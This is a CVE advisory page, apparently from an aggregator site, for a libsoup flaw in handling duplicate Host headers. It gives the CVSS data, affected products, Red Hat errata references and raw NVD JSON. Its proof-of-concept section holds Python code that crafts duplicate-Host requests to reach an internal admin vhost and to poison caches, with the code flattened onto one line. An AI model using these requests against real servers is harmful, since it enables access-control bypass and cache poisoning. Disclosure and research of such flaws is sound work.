Security Vulnerability Report
中文
CVE-2025-14523 CVSS 8.2 HIGH

CVE-2025-14523

Published: 2025-12-11 13:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

A flaw in libsoup’s HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers.

CVSS Details

CVSS Score
8.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

libsoup < 3.4.x (all versions prior to patch)
Red Hat Enterprise Linux 7
Red Hat Enterprise Linux 8
Red Hat Enterprise Linux 9
Fedora (all affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket def exploit_cve_2025_14523(target_host, target_port=80): """ PoC for CVE-2025-14523 - libsoup Host header smuggling This demonstrates the vulnerability where multiple Host headers cause routing confusion between proxy and backend. """ # Craft HTTP request with multiple Host headers # First Host: used by proxy for routing # Second Host: used by vulnerable libsoup backend request = ( "GET /admin HTTP/1.1\r\n" "Host: public-proxy-route.example.com\r\n" # Proxy uses this "Host: admin-internal.example.com\r\n" # libsoup uses this (vulnerability) "User-Agent: Mozilla/5.0\r\n" "Accept: */*\r\n" "Connection: close\r\n" "\r\n" ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) sock.send(request.encode()) response = sock.recv(4096) sock.close() return response.decode('utf-8', errors='ignore') except Exception as e: return f"Error: {str(e)}" def cache_poisoning_poc(target_host, target_port=80): """ Cache poisoning attack using Host header confusion """ request = ( "GET /static/image.png HTTP/1.1\r\n" "Host: victim-site.com\r\n" "Host: attacker-controlled-site.com\r\n" "User-Agent: Mozilla/5.0\r\n" "X-Forwarded-Host: attacker-controlled-site.com\r\n" "\r\n" ) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_host, target_port)) sock.send(request.encode()) response = sock.recv(8192) sock.close() return response

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14523", "sourceIdentifier": "[email protected]", "published": "2025-12-11T13:15:58.983", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw in libsoup’s HTTP header handling allows multiple Host: headers in a request and returns the last occurrence for server-side processing. Common front proxies often honor the first Host: header, so this mismatch can cause vhost confusion where a proxy routes a request to one backend but the backend interprets it as destined for another host. This discrepancy enables request-smuggling style attacks, cache poisoning, or bypassing host-based access controls when an attacker supplies duplicate Host headers."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-444"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:0421", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0422", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0423", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0836", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0867", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0868", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0905", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0906", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0907", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0908", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0909", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0911", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:0925", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1509", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1569", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1570", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1571", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:1572", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2025-14523", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2421349", "source": "[email protected]"}, {"url": "https://gitlab.gnome.org/GNOME/libsoup/-/issues/472", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.